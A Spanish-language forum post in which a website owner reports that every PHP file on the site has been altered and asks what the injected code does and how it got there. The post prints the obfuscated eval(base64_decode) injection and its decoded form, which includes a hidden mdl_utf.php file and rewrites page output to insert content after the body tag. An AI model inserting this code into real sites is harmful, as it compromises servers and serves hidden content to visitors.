Hola gente, necesito ayuda urgente.
Tengo un sitio web programado en php(5) y ayer cuado entre mediante ftp al sitio, vi que TODOS los archivos php tenian fecha de modificacion del 2/9/2009. Pero yo no actualice TODOS los archivos ese dia , si no unos cuantos. Cuando me baje los archivos para revisarlos, encontre con desagradable sorpesa que a todos se les habia incluido el siguiente codigo en la primera linea:


<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl 9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXsk R0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG 9tZTMvaWVtYXRlcmkvcHVibGljX2h0bWwvbWQvbGliL2VkaXRv ci90aW55bWNlL2pzY3JpcHRzL3RpbnlfbWNlL3RoZW1lcy9hZH ZhbmNlZC9kb2NzL2VuL2ltYWdlcy9tZGxfdXRmLnBocCcpKXtp bmNsdWRlX29uY2UoJy9ob21lMy9pZW1hdGVyaS9wdWJsaWNfaH RtbC9tZC9saWIvZWRpdG9yL3RpbnltY2UvanNjcmlwdHMvdGlu eV9tY2UvdGhlbWVzL2FkdmFuY2VkL2RvY3MvZW4vaW1hZ2VzL2 1kbF91dGYucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwn KSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bm N0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pk ZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MT A7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigk ZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpey RoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXsk aD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaC s9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1 PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbi BkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBu b25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy 9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgn LyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO3 1lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29i aCcpO319fQ==')); ?>

mediante un echo base64_decode..... pude ver el codigo que se genera, y no estoy seguro de q hace (el sitio sigue funcionando), pero vi que menciona un archivo: mdl_utf.php que en algun lado vi q no era bueno.

POrfa si alguien sabe que es esto, COMO sucedio, y cual es el riesgo, se los agradeceria mucho...a mi me parece que la informacion enviada esta siendo espiada o algo asi????? como medida preventiva, cambiamos los permisos a 755 y REGISTER_GLOBALS en off... pero no se si esto prevendra algo.

PD, dejo el codigo desencriptado :

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home3/iemateri/public_html/md/lib/editor/tinymce/jscripts/tiny_mce/themes/advanced/docs/en/images/mdl_utf.php')){include_once('/home3/iemateri/public_html/md/lib/editor/tinymce/jscripts/tiny_mce/themes/advanced/docs/en/images/mdl_utf.php');if(function_exists('gml')&&!function _exists('dgobh')){if(!function_exists('gzdecode')) {function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if( $f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if( $f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;} $u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;} return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}

Gracias, seguire Luchando